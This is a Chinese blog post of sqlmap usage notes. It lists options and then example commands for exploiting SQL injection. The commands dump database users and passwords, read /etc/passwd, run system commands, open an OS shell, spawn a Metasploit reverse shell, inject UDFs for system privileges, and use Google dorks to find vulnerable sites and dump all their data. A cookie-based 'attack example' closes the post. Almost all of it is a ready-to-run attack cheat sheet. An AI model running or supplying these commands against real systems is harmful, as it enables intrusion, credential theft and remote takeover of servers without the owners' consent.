sqlmap使用笔记

-u  #注入点
 -f  #指纹判别数据库类型
 -b  #获取数据库版本信息
 -p  #指定可测试的参数(?page=1&id=2 -p "page,id")
 -D"" #指定数据库名
 -T"" #指定表名
 -C"" #指定字段
 -s"" #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s "xx.log"恢复:-s "xx.log" -resume)
 --level=(1-5)   #要执行的测试水平等级,默认为 1
 --risk=(0-3)    #测试执行的风险等级,默认为 1
 --time-sec=(2,5)   #延迟响应,默认为 5
 --data    #通过 POST 发送数据
 --columns   #列出字段 --current-user   #获取当前用户名称
 --current-db   #获取当前数据库名称
 --users    #列数据库所有用户
 --passwords   #数据库用户所有密码
 --privileges   #查看用户权限(--privileges -U root)
 -U    #指定数据库用户
 --dbs    #列出所有数据库 --tables -D""   #列出指定数据库中的表
 --columns -T"user"-D"mysql" #列出 mysql 数据库中的 user 表的所有字段
 --dump-al   #列出所有数据库所有表
 --exclude-sysdbs  #只列出用户自己新建的数据库和表
 --dump -T""-D""- C""  #列出指定数据库的表的字段的数据(--dump -T users -D master -C surname)
 --dump -T""-D""--start 2 --top4  #列出指定数据库的表的 2-4 字段的数据
 --dbms    #指定数据库 (MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft 
Access,SQLite,Firebird,Sybase,SAP MaxDB)
 --os    #指定系统(Linux,Windows)
 **-v    #详细的等级(0-6)**

 0. 只显示 Python 的回溯,错误和关键消息
 1. 显示信息和警告消息
 2. 显示调试消息
 3. 有效载荷注入
 4. 显示 HTTP 请求
 5. 显示 HTTP 响应头
 6. 显示 HTTP 响应页面的内容
 
 --privileges    #查看权限
 --is-dba    #是否是数据库管理员
 --roles    #枚举数据库用户角色
 --udf-inject    #导入用户自定义函数(获取系统权限)
 --union-check    #是否支持 union 注入
 --union-cols   #union  查询表记录
 --union-test   #union 语句测试
 --union-use    #采用 union 注入
 --union-tech orderby  #union 配合 order by 
--data""    #POST 方式提交数据(--data "page=1&id=2")
 --cookie"用;号分开"  #cookie 注入(--cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”)
 --referer""   #使用 referer 欺骗(--referer "http://www.baidu.com")
 --user-agent""   #自定义 user-agent
 --proxy"http://127.0.0.1:8118" #代理注入
 --string=""   #指定关键词,字符串匹配.
 --threads   #采用多线程(--threads 3)
 --sql-shell   #执行指定 sql 命令
 --sql-query   # 执 行 指 定 的 sql 语 句 (--sql-query "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" )
 --file-read   #读取指定文件
 --file-write   #写入本地文件(--file-write /test/test.txt --file-dest /var/www/html/1.txt;将本 地的 test.txt 文件写入到目标的 1.txt)
 --file-dest   #要写入的文件绝对路径
 --os-cmd=id   #执行系统命令
 --os-shell   #系统交互 shell
 --os-pwn   #反弹 shell(--os-pwn --msf-path=/opt/framework/msf3/)
 --msf-path=   #matesploit 绝对路径(--msf-path=/opt/framework/msf3/)
 --os-smbrelay    #
 --os-bof    #
 --reg-read   #读取 win 系统注册表
 --priv-esc   #
 --time-sec=   #延迟设置 默认 --time-sec=5  为 5 秒
 -p"user-agent"--user-agent"sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" #指 user-agent 注入
 --eta    #盲注 
 
 /pentest/database/sqlmap/txt/ common-columns.txt
 字段字典 common-outputs.txt
 common-tables.txt 表字典
 keywords.txt
 oracle-default-passwords.txt
 user-agents.txt
 wordlist.txt

实例语句

sqlmap -u "URL"  --current-user    #获取当前用户名称
 sqlmap -u "URL"  --current-db      #获取当前数据库名称
 sqlmap -u "URL"  --tables  -D "db_name"   #列表名
 sqlmap -u "URL"  --columns -T "tablename" users-D "db_name" -v 0    #列字段
 sqlmap -u "URL"  --dump  -C "column_name"  -T "table_name" -D "db_name" -v 0    #获取字段内容
 sqlmap -u "URL"  --smart  --level 3 --users   # smart 智能 level 执行测试等级
 sqlmap -u "URL"  --dbms "Mysql" --users    # dbms 指定数据库类型
 sqlmap -u "URL"  --users      #列数据库用户 
 sqlmap -u "URL"  --dbs     #列数据库
 sqlmap -u "URL"  --passwords     #数据库用户密码
 sqlmap -u "URL"  --passwords-U root  -v 0   #列出指定用户数据库密码 
 sqlmap -u "URL"  --dump -C "password,user,id" -T "tablename" -D "db_name"--start 1 --stop 20  #列出指定 字段,列出 20 条
 sqlmap -u "URL"  --dump-all -v 0    #列出所有数据库所有表 
 sqlmap -u "URL"  --privileges     #查看权限
 sqlmap -u "URL"  --privileges -U root    #查看指定用户权限 
 sqlmap -u "URL"  --is-dba -v 1     #是否是数据库管理员 
 sqlmap -u "URL"  --roles     #枚举数据库用户角色
 sqlmap -u "URL"  --udf-inject     #导入用户自定义函数(获取系统权限!)
 sqlmap -u "URL"  --dump-all --exclude-sysdbs -v 0  #列出当前库所有表 
 sqlmap -u "URL"  --union-cols     #union 查询表记录
 sqlmap -u "URL"  --cookie "COOKIE_VALUE"  #cookie 注入 
 sqlmap -u "URL"  -b      #获取 banner 信息
 sqlmap -u "URL"  --data "id=3"     #post 注入 
 sqlmap -u "URL"  -v 1 -f     #指纹判别数据库类型
 sqlmap -u "URL"  --proxy"http://127.0.0.1:8118"  #代理注入
 sqlmap -u "URL"  --string"STRING_ON_TRUE_PAGE" #指定关键词 
 sqlmap -u "URL"  --sql-shell     #执行指定 sql 命令
 sqlmap -u "URL"  --file /etc/passwd
 sqlmap -u "URL"  --os-cmd=whoami    #执行系统命令
 sqlmap -u "URL"  --os-shell     #系统交互 shell 
 sqlmap -u "URL"  --os-pwn     #反弹 shell
 sqlmap -u "URL"  --reg-read     #读取 win 系统注册表 
 sqlmap -u "URL"  --dbs-o "sqlmap.log"    #保存进度
 sqlmap -u "URL"  --dbs  -o "sqlmap.log" --resume  #恢复已保存进度
 sqlmap -g "google 语法"   --dump-all --batch   #google 搜索注入点自动 跑出所有字段  

攻击实例

sqlmap -u "URL&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d 28f489ff1ab5a7531406" -string="Surname" --dbms=mysql --users --password 
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Luckysec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值